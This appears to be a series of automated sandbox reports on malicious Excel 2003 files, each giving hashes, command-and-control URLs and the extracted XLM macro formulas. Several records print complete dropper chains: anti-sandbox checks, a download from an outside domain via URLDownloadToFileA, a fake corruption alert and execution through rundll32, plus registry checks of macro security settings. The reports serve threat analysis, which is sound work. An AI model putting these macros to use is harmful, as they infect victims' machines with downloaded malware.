{"version":"0.2","sample":{"sample":"","kind":"file","target":"712bd0f5adbdbde82295d634e6cc61a06892afd3a283453ca8e5e9dd2d74dd4c"},"analysis":{"reported":"2020-04-09T16:17:00Z","score":10},"files":[{"filename":"712bd0f5adbdbde82295d634e6cc61a06892afd3a283453ca8e5e9dd2d74dd4c","filesize":147968,"md5":"dc8a4f852a77be9941313904b2484006","sha1":"f7c90d450a2bb1371d73b237e141285f74723694","sha256":"712bd0f5adbdbde82295d634e6cc61a06892afd3a283453ca8e5e9dd2d74dd4c","sha512":"94f97ebbd6ef00238c6722d1916269135b58e0e9a4bdae1595adeb858550bf02e13d653e3587544d54f09ffe484c1cdc32ec33460fc8e1303b47c5ee6822ddf5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"712bd0f5adbdbde82295d634e6cc61a06892afd3a283453ca8e5e9dd2d74dd4c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"L9m4XJkHhH\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7134ec79811104d51ab7b6928385b7b45f39741c7e76a8848949db9329b12a5e"},"analysis":{"reported":"2020-04-09T16:17:00Z","score":10},"files":[{"filename":"7134ec79811104d51ab7b6928385b7b45f39741c7e76a8848949db9329b12a5e","filesize":185344,"md5":"eb5685c2ffde07121420b0a730cc14c0","sha1":"cbe9e136977161b6c5e10def8a3c52392524719b","sha256":"7134ec79811104d51ab7b6928385b7b45f39741c7e76a8848949db9329b12a5e","sha512":"f522147a9c77aa7e901e4156478ef98394961a59d0ed5efb7b43ed0608022f7f0678409f7d0fffeb111da0b9ecb09a239105b633df9708a5843733e6ebf8d6c5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7134ec79811104d51ab7b6928385b7b45f39741c7e76a8848949db9329b12a5e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7141e568f13ba0202a1f5e0301a13b8f47a4d7e1b72e66d029f4ce54572eeeb7"},"analysis":{"reported":"2020-04-09T16:17:00Z","score":10},"files":[{"filename":"7141e568f13ba0202a1f5e0301a13b8f47a4d7e1b72e66d029f4ce54572eeeb7","filesize":185344,"md5":"76c2afec95e992a3e9920515820b406d","sha1":"3e072499a7d600a02e4c39fd25c54eb3f2da47c2","sha256":"7141e568f13ba0202a1f5e0301a13b8f47a4d7e1b72e66d029f4ce54572eeeb7","sha512":"dc08f26aec797312aeec0b6161cddbd40f84f95ee4fe493dca2f65a4556db00b683d078b98902ab657ce73d2dd370467f2ea97e8e9da7c857824660afa6d264b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7141e568f13ba0202a1f5e0301a13b8f47a4d7e1b72e66d029f4ce54572eeeb7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7148914706d4ab879aff81f0bbefae27bc60f103b931685dfbce1d200239d4b4"},"analysis":{"reported":"2020-04-09T16:17:00Z","score":10},"files":[{"filename":"7148914706d4ab879aff81f0bbefae27bc60f103b931685dfbce1d200239d4b4","filesize":112128,"md5":"1f3ea6df2ff0902c00f07c409efa3511","sha1":"f0a687fb9226124a012c6ece07bcb28e94483d99","sha256":"7148914706d4ab879aff81f0bbefae27bc60f103b931685dfbce1d200239d4b4","sha512":"70c98c06658411322a6cc187aa5f58a092d5ec80c1e69cb8456e3f07f2c969ce58717ad828505acecacc50865c49a9e59b5ada4e4c4cf47eb01bb3579ea561bd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7148914706d4ab879aff81f0bbefae27bc60f103b931685dfbce1d200239d4b4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"716a50ed6719b75bc315f891c9280539d6787470921ea6d4ef89f92c230be055"},"analysis":{"reported":"2020-04-09T16:17:00Z","score":10},"files":[{"filename":"716a50ed6719b75bc315f891c9280539d6787470921ea6d4ef89f92c230be055","filesize":147968,"md5":"b2dd4276fe4953628a9488a9de0200da","sha1":"093627a3fbab542630023b7e324423a5219b1489","sha256":"716a50ed6719b75bc315f891c9280539d6787470921ea6d4ef89f92c230be055","sha512":"d1e9d5b5e56a4f2c36347d394374d0aabbd95bb30cd8b78009bab89b72492103a0d817a10f9f7a641b34254071b5331520fd26d3d43a0f75bc60b97625318666","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"716a50ed6719b75bc315f891c9280539d6787470921ea6d4ef89f92c230be055.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"D7vyHFrTDF\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"71941d251a916b7bb20ce376945c3dd359d67e61382b2269521122677bbfb9a8"},"analysis":{"reported":"2020-04-09T16:17:00Z","score":10},"files":[{"filename":"71941d251a916b7bb20ce376945c3dd359d67e61382b2269521122677bbfb9a8","filesize":160768,"md5":"334bf6ec41ccae38505ded26103e23b7","sha1":"7501091798a7cce32faf723c4e2c41abad70f3d8","sha256":"71941d251a916b7bb20ce376945c3dd359d67e61382b2269521122677bbfb9a8","sha512":"843d785dcc7e5c1d311cda2b9b2cd31fad0ab1dec318677a2ccf245f81a4881261d5399770db9969ba965cb3a276f5f696443548a37d91b9a6c2babced252eb3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"71941d251a916b7bb20ce376945c3dd359d67e61382b2269521122677bbfb9a8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AGCWqRjfUF\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"71a1c14555d53a65f68784028f3643fcacea20a7004b8b2ee263aeba0c20ab13"},"analysis":{"reported":"2020-04-09T16:17:01Z","score":10},"files":[{"filename":"71a1c14555d53a65f68784028f3643fcacea20a7004b8b2ee263aeba0c20ab13","filesize":206336,"md5":"219d41251890948ae80543e0392c81d3","sha1":"4742ccad6e4f737e25bc56514fce1e6cb585e8ac","sha256":"71a1c14555d53a65f68784028f3643fcacea20a7004b8b2ee263aeba0c20ab13","sha512":"72f2b4c43158b190a079ac8d9b3af700fa70ef1acd93b25e33d8a2e49e4e63aedc5ff66770243f1d280db8b23646da49539f8ba1529d575a6e00110b491d2dc8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"71a1c14555d53a65f68784028f3643fcacea20a7004b8b2ee263aeba0c20ab13.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wkMWxnQ3o8\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"71b1952e0fe3c5d948e80a5e929ca27679a29cc29a9d8479f5d02dc09ccb8f81"},"analysis":{"reported":"2020-04-09T16:17:01Z","score":10},"files":[{"filename":"71b1952e0fe3c5d948e80a5e929ca27679a29cc29a9d8479f5d02dc09ccb8f81","filesize":167936,"md5":"6d232d6d664cb7864ddb1c3aa674793d","sha1":"cbc0b867371599ee9ee1d37f2af2f8ac795ce248","sha256":"71b1952e0fe3c5d948e80a5e929ca27679a29cc29a9d8479f5d02dc09ccb8f81","sha512":"658deb394a3cdaa182c1547a7898170628dee9c5c69ba942365023dd73938e678267a7c9cb09096c903a45d45786f7e5b793ce1afa873cf245b5ac0123302f33","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"71b1952e0fe3c5d948e80a5e929ca27679a29cc29a9d8479f5d02dc09ccb8f81.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zXGh2Ihy6c\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"71c818942dfc7eb72781f132bd828db258e9d6f52babd56b63bd7f17b0971d68"},"analysis":{"reported":"2020-04-09T16:17:01Z","score":10},"files":[{"filename":"71c818942dfc7eb72781f132bd828db258e9d6f52babd56b63bd7f17b0971d68","filesize":209920,"md5":"1b560e701177504f9da114410421eec4","sha1":"b81e698320c8c7d8ab1d033f6712c22ca1fc064c","sha256":"71c818942dfc7eb72781f132bd828db258e9d6f52babd56b63bd7f17b0971d68","sha512":"5f6b8adb2be5eb3a7867bd1a37edd69cdeaa1e50d07d92b4be9c5facc739f608815cf629a174fa522450168ee0ed54d44eed9448e5b82887e9b8d51e10069004","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"71c818942dfc7eb72781f132bd828db258e9d6f52babd56b63bd7f17b0971d68.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FDRHRxpb1D\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"71cdc6ac5cc4953ba77b87d388d924a7d830d0c08ba1393393c9e0296a6b1b3a"},"analysis":{"reported":"2020-04-09T16:17:01Z","score":10},"files":[{"filename":"71cdc6ac5cc4953ba77b87d388d924a7d830d0c08ba1393393c9e0296a6b1b3a","filesize":170496,"md5":"ea274a5b580f4904209c4826d6363849","sha1":"9231ba3694d909f6829074718c03335e00e13fe1","sha256":"71cdc6ac5cc4953ba77b87d388d924a7d830d0c08ba1393393c9e0296a6b1b3a","sha512":"9a751ee3da77f4364c83d7a0c808d6a79acbe80fb8ab35b6409f42809523c0c6331f4b8ea997fbe9d79b7faf6f704f65c22b92f00fb42311b9dc7cfdca41b452","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"71cdc6ac5cc4953ba77b87d388d924a7d830d0c08ba1393393c9e0296a6b1b3a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"M2OiDtVZib\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"71dc1137df8b992526c424451b311fc8e4f9e542369215292e31c7745f8b7183"},"analysis":{"reported":"2020-04-09T16:17:02Z","score":10},"files":[{"filename":"71dc1137df8b992526c424451b311fc8e4f9e542369215292e31c7745f8b7183","filesize":222208,"md5":"27b0a375c2f3083a30eed94bba47b614","sha1":"a71599a6d687fc8e813423d1119d485d7adacf9e","sha256":"71dc1137df8b992526c424451b311fc8e4f9e542369215292e31c7745f8b7183","sha512":"f57799382015366d4046969b2ecb6119cef4b468f86c7ed80e3de9ad9da3013439107d7d1d102076aec822b1f476f88032683642b5fa7107639c00037f0e2788","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"71dc1137df8b992526c424451b311fc8e4f9e542369215292e31c7745f8b7183.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"ROMAN(1975)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"71df06a624cfd427c02b59b01f968f1c2afabc1f895cb0a584b17bd6dd399d8f"},"analysis":{"reported":"2020-04-09T16:17:02Z","score":10},"files":[{"filename":"71df06a624cfd427c02b59b01f968f1c2afabc1f895cb0a584b17bd6dd399d8f","filesize":141824,"md5":"595559192fb3270cf6f7fca986f15f63","sha1":"6089e7d691bb638ba2dd66ce2ff41b60da3d8c36","sha256":"71df06a624cfd427c02b59b01f968f1c2afabc1f895cb0a584b17bd6dd399d8f","sha512":"10d6d36bdf3792bb13f2305b74142a0896c6995f8edee2e1e383727d81fab928cd60bdd1ffbc52d10e09e977a9320eecb4e7b94e1c5c7fc0397fa417e61eb8e7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"71df06a624cfd427c02b59b01f968f1c2afabc1f895cb0a584b17bd6dd399d8f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"mMGcYSJj6C\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"71e60701ad1bac3acaeef5d93a8946af422a5b3e08a7d7f8d8e426568b97dad6"},"analysis":{"reported":"2020-04-09T16:17:02Z","score":10},"files":[{"filename":"71e60701ad1bac3acaeef5d93a8946af422a5b3e08a7d7f8d8e426568b97dad6","filesize":209920,"md5":"4b05d2fa4fd4afcd39584c2a5b1f55a6","sha1":"8f2ccf82f70221fa81c7ee6da4d3499489b2cfae","sha256":"71e60701ad1bac3acaeef5d93a8946af422a5b3e08a7d7f8d8e426568b97dad6","sha512":"65e15ae0931672656f6fdf4aaffc89aceafd59f19e003e64cba2e69a63ca73c7b1b43d7fc04f2cb262633a58e6b289667f17686c0c5bec8c648de42fe69cb984","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"71e60701ad1bac3acaeef5d93a8946af422a5b3e08a7d7f8d8e426568b97dad6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vkl4nBD5ec\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"721ad3e8c4b94c78d3d83dcdebea2c9a26cc69383303e1f8a8f529ff00c4a6ba"},"analysis":{"reported":"2020-04-09T16:17:02Z","score":10},"files":[{"filename":"721ad3e8c4b94c78d3d83dcdebea2c9a26cc69383303e1f8a8f529ff00c4a6ba","filesize":185344,"md5":"8ab70cd47d27a7f9c00d045d32ce237f","sha1":"7032a13ab4d17c3dccdf2d6cb72f795d8c03474e","sha256":"721ad3e8c4b94c78d3d83dcdebea2c9a26cc69383303e1f8a8f529ff00c4a6ba","sha512":"f54451a79d267f78889d9bbd4b4f7bd7f28ff3ac387cbb4a3270f03f63cd1e462db9c540e5da7d6eaa56727bc9b1c7181995850cb976dcbdb5a0894d91aad122","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"721ad3e8c4b94c78d3d83dcdebea2c9a26cc69383303e1f8a8f529ff00c4a6ba.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"721caf3fda4572a16d6553d5c7adf3694225e90f601cadb967bc497dcb8418c1"},"analysis":{"reported":"2020-04-09T16:17:02Z","score":10},"files":[{"filename":"721caf3fda4572a16d6553d5c7adf3694225e90f601cadb967bc497dcb8418c1","filesize":113664,"md5":"06981109dba82a8eae6190dcfc831939","sha1":"c1ba09b185a5ca9a3a5cd83fea5d2ae5f58fe0b9","sha256":"721caf3fda4572a16d6553d5c7adf3694225e90f601cadb967bc497dcb8418c1","sha512":"4f38270ded79824616755315f1a2f068817f2a624f710734209dc6c84a58065aa41f79712f56b0fac0f7e7061fe9a43408e7b863e0a7b578e391380af051a91a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"721caf3fda4572a16d6553d5c7adf3694225e90f601cadb967bc497dcb8418c1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"L6uZmgi00q\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"723711b88dcd1a22ce1f18af2963cd464cbca435495b3fcc8d78cf0c5e70dc05"},"analysis":{"reported":"2020-04-09T16:17:02Z","score":10},"files":[{"filename":"723711b88dcd1a22ce1f18af2963cd464cbca435495b3fcc8d78cf0c5e70dc05","filesize":206336,"md5":"25e2327e18e4d24b060af34a0b100183","sha1":"fbf3a944bc16524a30cfa18e3c3cca41874b5846","sha256":"723711b88dcd1a22ce1f18af2963cd464cbca435495b3fcc8d78cf0c5e70dc05","sha512":"4b628bf29c4d09548206a6a613d77222aa71a9a739c9ab63197e3de693c37d8b3e083ed3a75d12a2e792152ee6f09825a71e6437e174ab47375e78b78f4b6b7e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"723711b88dcd1a22ce1f18af2963cd464cbca435495b3fcc8d78cf0c5e70dc05.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"982YKXE72i\",TRUE)\nGOTO(R$0C$18)"}}}]}
